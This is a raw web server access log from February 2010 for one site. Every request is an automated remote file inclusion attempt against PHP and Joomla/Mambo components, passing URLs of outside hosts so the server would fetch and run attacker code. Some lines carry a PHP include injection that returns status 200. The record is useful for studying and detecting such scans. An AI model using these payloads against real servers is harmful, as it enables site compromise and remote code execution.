69.64.70.246 - - [19/Feb/2010:07:22:23 -0800] "GET /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:22:26 -0800] "GET /logs/access_100202.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:22:26 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:22:26 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:33 -0800] "GET /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:33 -0800] "GET /logs/access_100122.log%20%20//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:33 -0800] "GET /logs//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:51 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:22:56 -0800] "GET /logs/access_100122.log//administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:23:00 -0800] "GET /logs/access_100202.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:23:00 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:23:00 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:23:02 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:23:02 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:23:02 -0800] "GET /logs/access_100210.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:07:23:45 -0800] "GET /orderSuccess.inc.php?glob=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:07:23:46 -0800] "GET /logs//orderSuccess.inc.php?glob=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:07:23:47 -0800] "GET /logs/access_100117.log%20%20//orderSuccess.inc.php?glob=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [19/Feb/2010:07:24:24 -0800] "GET /logs/access_100123.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:07:24:57 -0800] "GET /logs/access_100120.log%20%20//orderSuccess.inc.php?glob=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:25:19 -0800] "GET /logs/access_100123.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:25:48 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:25:48 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:25:48 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:26:39 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:26:40 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:26:40 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:26:56 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:26:56 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:26:57 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:26:59 -0800] "GET /includes/kb_constants.php?module_root_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:26:59 -0800] "GET /logs/includes/kb_constants.php?module_root_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:26:59 -0800] "GET /logs/access_100116.log%20%20/includes/kb_constants.php?module_root_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:27:06 -0800] "GET /logs/access_100206.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:27:21 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:27:21 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:27:22 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:27:22 -0800] "GET /logs/access_100204.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:27:22 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:07:27:22 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:27:34 -0800] "GET /logs/access_100206.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:27:38 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:27:38 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:27:38 -0800] "GET /logs/access_100121.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:27:41 -0800] "GET /logs/access_100121.log%20%20/includes/kb_constants.php?module_root_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:27:51 -0800] "GET /logs/access_100121.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:27:51 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:27:51 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:07:27:58 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:07:27:58 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:07:27:58 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:07:27:58 -0800] "GET /logs/access_100124.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chloethecat.com//guestbook/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:28:07 -0800] "GET /logs/access.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:28:14 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:28:14 -0800] "GET /logs/access_100121.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:28:14 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:28:17 -0800] "GET /logs/access_100203.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:28:25 -0800] "GET /logs/access_100202.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:28:26 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:28:27 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:28:38 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:28:42 -0800] "GET /logs/access_100203.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:28:42 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:28:42 -0800] "GET /logs/access_100121.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:28:47 -0800] "GET /logs/access_100202.log///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:28:48 -0800] "GET //modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.127.209.105 - - [19/Feb/2010:07:28:49 -0800] "GET /logs///modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:00 -0800] "GET /logs/includes/kb_constants.php?module_root_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:00 -0800] "GET /logs/access_100116.log/includes/kb_constants.php?module_root_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:00 -0800] "GET /includes/kb_constants.php?module_root_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:09 -0800] "GET /logs/access.log%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:29:10 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:29:10 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:29:10 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:29:11 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:29:11 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [19/Feb/2010:07:29:11 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.modernart2day.se//administrator/cache/satu?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:28 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:28 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:28 -0800] "GET /logs/access_100206.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:30 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:30 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:30 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:35 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:35 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:35 -0800] "GET /logs/access_100206.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:35 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:37 -0800] "GET /logs/access_100121.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:37 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:39 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:39 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:29:40 -0800] "GET /logs/access_100206.log%20%20//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:29:58 -0800] "GET /logs/access_100121.log/includes/kb_constants.php?module_root_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:30:14 -0800] "GET /logs/access_100121.log//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:30:14 -0800] "GET /logs//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:30:14 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:30:23 -0800] "GET /logs/access_100206.log//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:30:23 -0800] "GET /logs//administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:30:23 -0800] "GET /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:33:59 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:33:59 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [19/Feb/2010:07:33:59 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
